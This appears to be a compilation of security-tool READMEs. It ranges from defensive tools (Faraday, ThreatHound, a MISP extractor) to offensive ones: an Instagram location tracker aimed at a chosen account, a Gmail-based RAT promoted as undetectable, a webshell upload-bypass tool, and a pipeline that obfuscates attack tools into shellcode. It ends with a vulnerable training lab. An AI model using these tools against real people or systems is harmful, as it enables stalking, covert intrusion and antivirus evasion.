
Tracgram - Use Instagram Location Features To Track An Account



Usage

At this moment, the usage of Tracgram is extremely simple:

1. Download this repository

2. Go through the installation steps

3. Change the parameters in the tracgram main method directly (see the example after these steps):
+ Mandatory:
- NICKNAME: your username on Instagram
- PASSWORD: your Instagram password
- OBJECTIVE: the target account's username

+ Optional:
- path_to_csv: the path where the CSV file will be stored, including the file name


4. Execute it with python3 tracgram.py
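
As an illustration only (the exact structure of the main method in tracgram.py may differ), filling in the parameters from step 3 could look like this:

# Hypothetical values edited in the tracgram main method
NICKNAME = "my_instagram_user"          # your Instagram username
PASSWORD = "my_instagram_password"      # your Instagram password
OBJECTIVE = "target_account"            # the username you want to analyze
path_to_csv = "./output/locations.csv"  # optional: where the CSV file is written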

Installation steps

  1. Download with $ git clone https://github.com/initzerCreations/Tracgram

  2. Install dependencies using pip install -r requirements.txt

  3. Congrats! By now you should be able to run it: python3 tracgram.py

Screenshots

Features

  1. Provides a heatmap based on the location frequency

  2. Markers displayed on the heatmap indicating:

    • Exact location name
    • Time when the related post was made
    • Link to Google Maps address
  3. Graph relating the post count for a specific location

  4. Generates an easy-to-process .CSV file



Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions




Note:

 This RAT communicates via Gmail SMTP (or you can use any other SMTP provider as well), but Gmail SMTP is a good choice because most companies block unknown traffic, while Gmail traffic is generally trusted and allowed everywhere.

Warning:

 1. Don't upload any payloads to VirusTotal.com, because the tool will stop working over time.
2. VirusTotal shares signatures with AV companies.
3. Again, don't be an idiot!

How To Setup

 1. Create two separate Gmail accounts.
2. Enable SMTP on both accounts (check YouTube if you don't know how).
3. Suppose you have already created the two separate Gmail accounts with SMTP enabled:
A -> first account, Your_1st_gmail@gmail.com
B -> second account, your_2nd_gmail@gmail.com
4. Go to the server.py file and fill in the following at line 67:
smtpserver="smtp.gmail.com" (don't change this)
smtpuser="Your_1st_gmail@gmail.com"
smtpkey="your_1st_gmail_app_password"
imapserver="imap.gmail.com" (don't change this)
imapboy="your_2nd_gmail@gmail.com"
5. Go to the client.py file and fill in the following at line 16:
imapserver = "imap.gmail.com" (don't change this)
username = "your_2nd_gmail@gmail.com"
password = "your_2nd_gmail_app_password"
getting = "Your_1st_gmail@gmail.com"
smtpserver = "smtp.gmail.com" (don't change this)
6. Enjoy.

How To Run:-

 For Windows:
1. Make sure Python 3 and pip are installed, along with the requirements.
2. python server.py (on server side)


For Linux:
1. Make sure all requirements are installed.
2. python3 server.py (on server side)

C2 Features:-

 1) Persistence (type persist)
2) Shell Access
3) System Info (type info)
4) More Features Will Be Added

Features:-

1) FUD Ratio 0/40
2) Bypasses EDR solutions
3) Bypasses network restrictions
4) Commands are sent in Base64 and decoded on the server side
5) No more TCP hassles

Warning:-

Use this tool only for educational purposes. I will not be responsible for your misuse of it.


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetration tests, red team exercises, and other great activities, there is always a moment when you need to launch amass, subfinder, Sublist3r, or any other tool to find subdomains you can use to break through, like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will find the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bug bounty programs collected by chaos.projectdiscovery.io and bounty-targets-data, plus programs that simply have responsible disclosure policies, for a total of 4095 domains. If a subdomain appears in more than 5-10 different scopes, it is put into the corresponding list. For example, if dev.stg appears in both *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears within *.google.com. That's all - nothing more, nothing less.
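
The counting logic can be sketched as follows (an illustration of the methodology only, not the repository's actual code; the input format is assumed):

from collections import defaultdict

# scope -> subdomains observed in that scope (assumed input format)
scopes = {
    "*.google.com": ["dev.stg", "dev.stg", "mail"],
    "*.twitter.com": ["dev.stg", "api"],
}

# Count in how many distinct scopes each subdomain appears,
# ignoring how often it repeats inside a single scope.
seen_in = defaultdict(set)
for scope, subdomains in scopes.items():
    for sub in subdomains:
        seen_in[sub].add(scope)

for sub, scopes_with_sub in sorted(seen_in.items(), key=lambda kv: -len(kv[1])):
    print(sub, len(scopes_with_sub))  # dev.stg 2, mail 1, api 1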

You can find the complete list of sources here

Lists

Subdomains

In these lists, you will find the most popular subdomains as-is.

Name Words count Size
subdomains.txt.gz 21901389 501MB
subdomains_top100.txt 100 706B
subdomains_top1000.txt 1000 7.2KB
subdomains_top10000.txt 10000 70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains, split by levels. For example, the dev.stg subdomain will be split into two words, dev and stg; dev will have level = 2 and stg level = 1. You can use these wordlists for combinatory attacks in subdomain searches. There are several level.txt wordlists, one per subdomain level.
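
As a minimal illustration of this level numbering (not the repository's code):

subdomain = "dev.stg"

# Level 1 is the label closest to the registered domain, so levels are
# numbered right to left: stg -> level 1, dev -> level 2.
for level, word in enumerate(reversed(subdomain.split(".")), start=1):
    print(f"level_{level}: {word}")
# level_1: stg
# level_2: dev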

Name Words count Size
level_1.txt.gz 8096054 153MB
level_2.txt.gz 7556074 106MB
level_3.txt.gz 1490999 18MB
level_4.txt.gz 205969 3.2MB
level_5.txt.gz 71716 849KB
level_1_top100.txt 100 633B
level_1_top1000.txt 1000 6.6K
level_2_top100.txt 100 550B
level_2_top1000.txt 1000 5.6KB
level_3_top100.txt 100 531B
level_3_top1000.txt 1000 5.1KB
level_4_top100.txt 100 525B
level_4_top1000.txt 1000 5.0KB
level_5_top100.txt 100 449B
level_5_top1000.txt 1000 5.0KB

Popular split subdomains

In these lists, you will find the most popular split words from subdomains on all levels. For example, the dev.stg subdomain will be split into the two words dev and stg.

Name Words count Size
words.txt.gz 17229401 278MB
words_top100.txt 100 597B
words_top1000.txt 1000 5.5KB
words_top10000.txt 10000 62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



Reverseip_Py - Domain Parser For IPAddress.com Reverse IP Lookup


Domain parser for IPAddress.com Reverse IP Lookup. Written in Python 3.

What is Reverse IP?

Reverse IP refers to the process of looking up all the domain names that are hosted on a particular IP address. This can be useful for a variety of reasons, such as identifying all the websites that are hosted on a shared hosting server or finding out which websites are hosted on the same IP address as a particular website.
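
A lookup of this kind is typically done by scraping the provider's results page. The sketch below only illustrates the idea using the libraries listed in the requirements; the URL path and HTML handling are assumptions and may differ from what reverseip.py actually does:

import requests
from bs4 import BeautifulSoup

def reverse_ip(target: str) -> list[str]:
    # Hypothetical endpoint; the real path used by reverseip.py may differ.
    url = f"https://www.ipaddress.com/reverse-ip-lookup/{target}"
    html = requests.get(url, timeout=10).text
    soup = BeautifulSoup(html, "html.parser")
    # Assumed markup: collect link texts that look like domain names.
    texts = (a.get_text(strip=True) for a in soup.find_all("a"))
    return sorted({t for t in texts if "." in t and " " not in t})

if __name__ == "__main__":
    for domain in reverse_ip("google.com"):
        print(domain)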


Requirements

  • beautifulsoup4
  • requests
  • urllib3

Tested on Debian with Python 3.10.8

Install Requirements

pip3 install -r requirements.txt

How to Use

Help Menu

python3 reverseip.py -h
usage: reverseip.py [-h] [-t target.com]

options:
-h, --help show this help message and exit
-t target.com, --target target.com
Target domain or IP

Reverse IP

python3 reverseip.py -t google.com

Disclaimer

Any actions and/or activities related to the material contained within this tool are solely your responsibility. The misuse of the information in this tool can result in criminal charges being brought against the persons in question.

Note: modifications and changes to this code are accepted; however, every public release that uses this code must be approved by the author of this tool (yuyudhn).



Faraday - Open Source Vulnerability Management Platform


Security has two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve remediation efforts. With Faraday, you may focus on discovering vulnerabilities while we help you with the rest. Just use it in your terminal and get your work organized on the run. Faraday was made to let you take advantage of the available tools in the community in a truly multiuser way.

Faraday aggregates and normalizes the data you load, allowing you to explore it through different visualizations that are useful to managers and analysts alike.

To read about the latest features check out the release notes!


Install

Docker-compose

The easiest way to get Faraday up and running is using our docker-compose:

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml
$ docker-compose up

If you want to customize, you can find an example config over here Link

Docker

You need to have a PostgreSQL instance running first.

 $ docker run \
-v $HOME/.faraday:/home/faraday/.faraday \
-p 5985:5985 \
-e PGSQL_USER='postgres_user' \
-e PGSQL_HOST='postgres_ip' \
-e PGSQL_PASSWD='postgres_password' \
-e PGSQL_DBNAME='postgres_db_name' \
faradaysec/faraday:latest

PyPi

$ pip3 install faradaysec
$ faraday-manage initdb
$ faraday-server

Binary Packages (Debian/RPM)

You can find the installers on our releases page

$ sudo apt install faraday-server_amd64.deb
# Add your user to the faraday group
$ faraday-manage initdb
$ sudo systemctl start faraday-server


Source

If you want to run directly from this repo, this is the recommended way:

$ pip3 install virtualenv
$ virtualenv faraday_venv
$ source faraday_venv/bin/activate
$ git clone git@github.com:infobyte/faraday.git
$ pip3 install .
$ faraday-manage initdb
$ faraday-server

Check out our documentation for detailed information on how to install Faraday in all of our supported platforms

For more information about the installation, check out our Installation Wiki.

You can now go to http://localhost:5985 in your browser and log in with "faraday" as the username and the password given by the installation process.

Getting Started

Learn about Faraday's holistic approach and rethink vulnerability management.

Integrating faraday in your CI/CD

Setup Bandit and OWASP ZAP in your pipeline

Setup Bandit, OWASP ZAP and SonarQube in your pipeline

Faraday Cli

Faraday-cli is our command-line client, providing easy access to the console tools; work with Faraday directly from the terminal!

This is a great way to automate scans, integrate Faraday into your CI/CD pipeline, or just get metrics from a workspace.

$ pip3 install faraday-cli

Check our faraday-cli repo

Check out the documentation here.


Faraday Agents

Faraday Agents Dispatcher is a tool that gives Faraday the ability to run scanners or tools remotely from the platform and get the results.

Plugins

Connect your favorite tools through our plugins. Right now there are more than 80 supported tools, among which you will find:


Missing your favorite one? Create a Pull Request!

There are two Plugin types:

Console plugins which interpret the output of the tools you execute.

$ faraday-cli tool run "nmap www.exampledomain.com"
💻 Processing Nmap command
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-22 14:13 -03
Nmap scan report for www.exampledomain.com (10.196.205.130)
Host is up (0.17s latency).
rDNS record for 10.196.205.130: 10.196.205.130.bc.example.com
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
2222/tcp open EtherNetIP-1
3306/tcp closed mysql
Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
⬆ Sending data to workspace: test
✔ Done

Report plugins, which allow you to import previously generated artifacts like XMLs and JSONs.

faraday-cli tool report burp.xml

Creating custom plugins is super easy. Read more about Plugins.

API

You can access our API directly; check out the documentation here.

Links



ThreatHound - Tool That Helps You With Your IR & Threat Hunting And CA


This tool will help you with your IR, Threat Hunting, and Compromise Assessment (CA). Just drop your event log file and analyze the results.


New Release Features:

  • Supports Windows (ThreatHound.exe)
  • A new version is also available in C for Linux-based systems
  • You can now save results to a JSON file or print them on screen with the 'print' argument ('yes' to print the results on screen, 'no' to save them to a JSON file)
  • You can pass a Windows event logs folder, a single EVTX file, or multiple EVTX files separated by commas with the -p argument
  • You can now pass the Sigma rules path with the -s argument
  • Added multithreading to improve running speed
  • ThreatHound.exe is agent-based; you can push it to and run it on multiple servers
  • Example:
$ ThreatHound.exe -s ..\sigma_rules\ -p C:\Windows\System32\winevt\Logs\ -print no
  • NOTE: give cmd full permission to read from "C:\Windows\System32\winevt\Logs"

  • Linux Based:

  • Windows Based

I've built the following:

  • A dedicated backend to support Sigma rules for python
  • A dedicated backend for parsing evtx for python
  • A dedicated backend to match between evtx and the Sigma rules
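
To illustrate the idea of matching rules against parsed EVTX records, here is a minimal sketch. This is not ThreatHound's code; it assumes the "evtx" PyPI package, and the simplistic keyword "rule" is only a stand-in for real Sigma matching:

import json
from evtx import PyEvtxParser  # assumed dependency, installed separately

def scan(evtx_path: str, keyword: str) -> list[dict]:
    """Very simplified stand-in for Sigma matching: flag records containing a keyword."""
    hits = []
    parser = PyEvtxParser(evtx_path)
    for record in parser.records_json():
        data = json.loads(record["data"])
        if keyword.lower() in json.dumps(data).lower():
            hits.append({"event_record_id": record["event_record_id"], "event": data})
    return hits

if __name__ == "__main__":
    for hit in scan(r"C:\Windows\System32\winevt\Logs\Security.evtx", "mimikatz"):
        print(json.dumps(hit, indent=2))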

Features of the tool:

  • Automation of Threat Hunting, Compromise Assessment, and Incident Response for Windows Event Logs
  • Downloads and updates the Sigma rules daily from the source
  • More than 50 detection rules included
  • Support for more than 1500 Sigma detection rules
  • Support for dynamically adding new Sigma rules to the detection rules
  • Saves all outputs in JSON format
  • Easily add any detection rules you prefer
  • You can easily add new event log source types in mapping.py

To-do:

  • Support for Sigma rules dedicated to DNS queries
  • Improving the speed of the detection algorithm
  • Adding JSON output that supports Splunk
  • More features

Installation:

$ git clone https://github.com/MazX0p/ThreatHound.git
$ cd ThreatHound
$ pip install -r requirements.txt
$ python3 ThreatHound.py
  • Note: glob doesn't support getting the path of a directory that has spaces in its folder names, so please ensure the tool's path contains no spaces (in folder names)

Demo:

https://player.vimeo.com/video/784137549?h=6a0e7ea68a&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479

Screenshots:



Upload_Bypass_Carnage - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!



POC video:

File upload restrictions bypass using different bug bounty techniques! The tool must be run with all of its assets!


Installation:

pip3 install -r requirements.txt

Usage: upload_bypass.py [options]

Options: -h, --help

  show this help message and exit

-u URL, --url=URL

  Supply the login page, for example: -u http://192.168.98.200/login.php'

-s , --success

 Success message shown when an image is uploaded, for example: -s 'Image uploaded successfully.'

-e , --extension

 Provide server backend extension, for example: --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a , --allowed

 Provide allowed extensions to be uploaded, for example: php,asp,jsp,perl

-H , --header

 (Optional) - for example: '"X-Forwarded-For":"10.10.10.10"' - Use double quotes around the data and wrap it all in single quotes. Use a comma to separate multiple headers.

-l , --location

 (Optional) - Supply a remote path where the webshell is supposed to be. For example: /uploads/

-S, --ssl

 (Optional) - No checks for TLS or SSL

-p, --proxy

 (Optional) - Channel the requests through a proxy

-c, --continue

 (Optional) - If set, the brute force will continue even after one or more working methods are found!

-v, --verbose

 (Optional) - Print the HTTP response in the terminal

-U , --username

 (Optional) - Username for authentication. For example: --username admin

-P , --password

 (Optional) - Password for authentication. For example: --password 12345


OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises


OffensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises.
A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.


Features

  • Currently only supports C# (.Net Framework) projects
  • Allows cloning public and private (you will need credentials :D) git repositories
  • Allows working with local folders
  • Randomizes project GUIDs
  • Randomizes application information contained in AssemblyInfo
  • Builds C# projects
  • Obfuscates generated binaries
  • Generates shellcodes from binaries
  • There are 79 tools parameterised in YML templates (not all of them may work :D)
  • New tools can be added using YML templates
  • It should be easy to add new plugins...

What's new in version 2.0

  • Almost complete code rewrite (new bugs?)
  • Cloning from private repositories possible (authentication via GitHub authToken)
  • Possibility to copy a local folder instead of cloning from a remote repository
  • New module to generate shellcodes with Donut
  • New module to randomize GUIDs of applications
  • New module to randomize the AssemblyInfo of each application
  • 60 new tools added

Examples

  • List all tools:
OffensivePipeline.exe list
  • Build all tools:
OffensivePipeline.exe all
  • Build a tool
OffensivePipeline.exe t toolName
  • Clean cloned and built tools
OffensivePipeline.exe 

Output example

PS C:\OffensivePipeline> .\OffensivePipeline.exe t rubeus

ooo
.osooooM M
___ __ __ _ ____ _ _ _ +y. M M
/ _ \ / _|/ _| ___ _ __ ___(_)_ _____| _ \(_)_ __ ___| (_)_ __ ___ :h .yoooMoM
| | | | |_| |_ / _ \ '_ \/ __| \ \ / / _ \ |_) | | '_ \ / _ \ | | '_ \ / _ \ oo oo
| |_| | _| _| __/ | | \__ \ |\ V / __/ __/| | |_) | __/ | | | | | __/ oo oo
\___/|_| |_| \___|_| |_|___/_| \_/ \___|_| |_| .__/ \___|_|_|_| |_|\___| oo oo
|_| MoMoooy. h:
M M .y+
M Mooooso.
ooo

@aetsu
v2.0.0


[+] Loading tool: Rubeus
Clonnig repository: Rubeus into C:\OffensivePipeline\Git\Rubeus
Repository Rubeus cloned into C:\OffensivePipeline\Git\Rubeus

[+] Load RandomGuid module
Searching GUIDs...
> C:\OffensivePipeline\Git\Rubeus\Rubeus.sln
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
Replacing GUIDs...
File C:\OffensivePipeline\Git\Rubeus\Rubeus.sln:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!


[+] Load RandomAssemblyInfo module
Replacing strings in C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
[assembly: AssemblyTitle("Rubeus")] -> [assembly: AssemblyTitle("g4ef3fvphre")]
[assembly: AssemblyDescription("")] -> [assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")] -> [assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")] -> [assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Rubeus")] -> [assembly: AssemblyProduct("g4ef3fvphre")]
[assembly: AssemblyCopyright("Copyright © 2018")] -> [assembly: AssemblyCopyright("Copyright © 2018")]
[assembly: AssemblyTrademark("")] -> [assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")] -> [assembly: AssemblyCulture("")]


[+] Load BuildCsharp module
[+] Checking requirements...
[*] Downloading nuget.exe from https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
[+] Download OK - nuget.exe
[+] Path found - C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat
Solving dependences with nuget...
Building solution...
[+] No errors!
[+] Output folder: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


[+] Load ConfuserEx module
[+] Checking requirements...
[+] Downloading ConfuserEx from https://github.com/mkaring/ConfuserEx/releases/download/v1.6.0/ConfuserEx-CLI.zip
[+] Download OK - ConfuserEx
Confusing...
[+] No errors!


[+] Load Donut module
Generating shellcode...

Payload options:
Domain: RMM6XFC3
Runtime:v4.0.30319

Raw Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin
B64 Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin.b64

[+] No errors!


[+] Generating Sha256 hashes
Output file: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


-----------------------------------------------------------------
SUMMARY

- Rubeus
- RandomGuid: OK
- RandomAssemblyInfo: OK
- BuildCsharp: OK
- ConfuserEx: OK
- Donut: OK

-----------------------------------------------------------------

Plugins

  • RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
  • RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
  • BuildCsharp: build c# project
  • ConfuserEx: obfuscate c# tools
  • Donut: use Donut to generate shellcodes. The generated shellcode takes no parameters; this may change in future releases.

Add a tool from a remote git

The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:

  • Rubeus.yml file:
tool:
  - name: Rubeus
    description: Rubeus is a C# toolset for raw Kerberos interaction and abuses
    gitLink: https://github.com/GhostPack/Rubeus
    solutionPath: Rubeus\Rubeus.sln
    language: c#
    plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
    authUser:
    authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use on this tool build process
  • AuthUser: user name from github (not used for public repositories)
  • AuthToken: auth token from github (not used for public repositories)

Add a tool from a private git

tool:
  - name: SharpHound3-Custom
    description: C# Rewrite of the BloodHound Ingestor
    gitLink: https://github.com/aaaaaaa/SharpHound3-Custom
    solutionPath: SharpHound3-Custom\SharpHound3.sln
    language: c#
    plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
    authUser: aaaaaaa
    authToken: abcdefghijklmnopqrsthtnf

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use on this tool's build process
  • AuthUser: user name from GitHub
  • AuthToken: auth token from GitHub (documented at GitHub: creating a personal access token)

Add a tool from local git folder

tool:
  - name: SeatbeltLocal
    description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
    gitLink: C:\Users\alpha\Desktop\SeatbeltLocal
    solutionPath: SeatbeltLocal\Seatbelt.sln
    language: c#
    plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
    authUser:
    authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: path where the tool is located
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use on this tool's build process
  • AuthUser: user name from github (not used for local repositories)
  • AuthToken: auth token from github (not used for local repositories)

Requirements for the release version (Visual Studio 2019/2022 is not required)

In the OffensivePipeline.dll.config file it's possible to change the version of the build tools used.

  • Build Tools 2019:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\Common7\Tools\VsDevCmd.bat"/>
  • Build Tools 2022:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat"/>

Requirements for build

Credits

Supported tools



Misp-Extractor - Tool That Connects To A MISP Instance And Retrieves Attributes Of Specific Types (Such As IP Addresses, URLs, And Hashes)


This code connects to a given MISP (Malware Information Sharing Platform) server and parses a given number of events, writing the IP addresses, URLs, and MD5 hashes found in the events to three separate files.


Usage

To use this script, you will need to provide the URL of your MISP instance and a valid API key. You can then call the MISPConnector.run() method to retrieve the attributes and save them to files.

To use the code, run the following command:

python3 misp_connector.py --misp-url <MISP_URL> --misp-key <MISP_API_KEY> --limit <EVENT_LIMIT>

Supported attribute types

The MISPConnector class currently supports the following attribute types:

  • ip-src
  • ip-dst
  • md5
  • url
  • domain

If an attribute of one of these types is found in an event, it will be added to the appropriate set (for example, IP addresses will be added to the network_set) and written to the corresponding file (network.txt, hash.txt, or url.txt).
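
A minimal sketch of this flow using PyMISP (the misp.search() call is mentioned in the Limitations section below; the exact arguments and file handling in misp_connector.py may differ):

from pymisp import PyMISP

MISP_URL = "https://misp.example.org"   # hypothetical instance URL
MISP_KEY = "YOUR_API_KEY"               # hypothetical API key

misp = PyMISP(MISP_URL, MISP_KEY, ssl=True)

network_set, hash_set, url_set = set(), set(), set()
events = misp.search(controller="events", limit=2000, pythonify=True)
for event in events:
    for attr in event.attributes:
        if attr.type in ("ip-src", "ip-dst", "domain"):
            network_set.add(attr.value)
        elif attr.type == "md5":
            hash_set.add(attr.value)
        elif attr.type == "url":
            url_set.add(attr.value)

# Write each set to its corresponding file, as described above.
for name, values in (("network.txt", network_set), ("hash.txt", hash_set), ("url.txt", url_set)):
    with open(name, "w") as fh:
        fh.write("\n".join(sorted(values)))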

Configuration

The code can be configured by passing arguments to the command-line script. The available arguments are:

  • misp-url: The URL of the MISP server. This argument is required.
  • misp-key: The API key for the MISP server. This argument is required.
  • limit: The maximum number of events to parse. The default is 2000.

Limitations

This script has the following limitations:

  • It only retrieves attributes of specific types (as listed above).
  • It only writes the retrieved attributes to files, without any further processing or analysis.
  • It only retrieves a maximum of 2000 events, as specified by the limit parameter in the misp.search() method.

License

This code is provided under the MIT License. See the LICENSE file for more details.



Web-Hacking-Playground - Web Application With Vulnerabilities Found In Real Cases, Both In Pentests And In Bug Bounty Programs


Web Hacking Playground is a controlled web hacking environment. It consists of vulnerabilities found in real cases, both in pentests and in Bug Bounty programs. The objective is that users can practice with them, and learn to detect and exploit them.

Other topics of interest will also be addressed, such as: bypassing filters by creating custom payloads, executing chained attacks exploiting various vulnerabilities, developing proof-of-concept scripts, among others.


Important

The application source code is visible. However, the lab's approach is a black box one. Therefore, the code should not be reviewed to resolve the challenges.

Additionally, it should be noted that fuzzing (both parameters and directories) and brute force attacks do not provide any advantage in this lab.

Setup

It is recommended to use Kali Linux to perform this lab. In case of using a virtual machine, it is advisable to use the VMware Workstation Player hypervisor.

The environment is based on Docker and Docker Compose, so it is necessary to have both installed.

To install Docker on Kali Linux, run the following commands:

sudo apt update -y
sudo apt install -y docker.io
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

To install Docker on other Debian-based distributions, run the following commands:

curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

It is recommended to log out and log in again so that the user is recognized as belonging to the docker group.

To install Docker Compose, run the following command:

sudo apt install -y docker-compose

Note: In case of using M1 it is recommended to execute the following command before building the images:

export DOCKER_DEFAULT_PLATFORM=linux/amd64

The next step is to clone the repository and build the Docker images:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose build

Also, it is recommended to install the Foxy Proxy browser extension, which allows you to easily change proxy settings, and Burp Suite, which we will use to intercept HTTP requests.

We will create a new profile in Foxy Proxy to use Burp Suite as a proxy. To do this, we go to the Foxy Proxy options, and add a proxy with the following configuration:

  • Proxy Type: HTTP
  • Proxy IP address: 127.0.0.1
  • Port: 8080

Deployment

Once everything you need is installed, you can deploy the environment with the following command:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose up -d

This will create two containers of applications developed in Flask on port 80:

  • The vulnerable web application (Socially): Simulates a social network.
  • The exploit server: You should not try to hack it, since it does not have any vulnerabilities. Its objective is to simulate a victim's access to a malicious link.

Important

It is necessary to add the IP of the containers to the /etc/hosts file, so that they can be accessed by name and that the exploit server can communicate with the vulnerable web application. To do this, run the following commands:

sudo sed -i '/whp-/d' /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-socially) whp-socially" | sudo tee -a /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-exploitserver) whp-exploitserver" | sudo tee -a /etc/hosts

Once this is done, the vulnerable application can be accessed from http://whp-socially and the exploit server from http://whp-exploitserver.

When using the exploit server, the above URLs must be used, using the domain name and not the IPs. This ensures correct communication between containers.

When it comes to hacking, to represent the attacker's server, the local Docker IP must be used, since the lab is not intended to make requests to external servers such as Burp Collaborator, Interactsh, etc. A Python http.server can be used to simulate a web server and receive HTTP interactions. To do this, run the following command:

sudo python3 -m http.server 80

Stages

The environment is divided into three stages, each with different vulnerabilities. It is important that they are done in order, as the vulnerabilities in the following stages build on those in the previous stages. The stages are:

  • Stage 1: Access with any user
  • Stage 2: Access as admin
  • Stage 3: Read the /flag file

Important

Below are spoilers for each stage's vulnerabilities. If you don't need help, you can skip this section. On the other hand, if you don't know where to start, or want to check if you're on the right track, you can extend the section that interests you.

Stage 1: Access with any user

Display

At this stage, a specific user's session can be stolen through Cross-Site Scripting (XSS), which allows JavaScript code to be executed. To do this, the victim must access a URL in the user's context; this behavior can be simulated with the exploit server.

The hints to solve this stage are:

  • Are there any striking posts on the home page?
  • You have to chain two vulnerabilities to steal the session. XSS is achieved by exploiting an Open Redirect vulnerability, where the victim is redirected to an external URL.
  • The Open Redirect has some security restrictions. You have to find how to get around them. Analyze which strings are not allowed in the URL.
  • Cookies are not the only place where session information is stored. Reviewing the source code of the JavaScript files included in the application can help clear up doubts.

Stage 2: Access as admin

Display

At this stage, a token can be generated that allows access as admin. This is a typical JSON Web Token (JWT) attack, in which the token payload can be modified to escalate privileges.

The hint to solve this stage is that there is an endpoint that, given a JWT, returns a valid session cookie.

Stage 3: Read the /flag file

Display

At this stage, the /flag file can be read through a Server-Side Template Injection (SSTI) vulnerability. To do this, you must get the application to run Python code on the server. It is possible to execute system commands on the server.

The hints to solve this stage are:

  • Vulnerable functionality is protected by two-factor authentication. Therefore, before exploiting the SSTI, a way to bypass the OTP code request must be found. There are times when the application trusts the requests that are made from the same server and the HTTP headers play an important role in this situation.

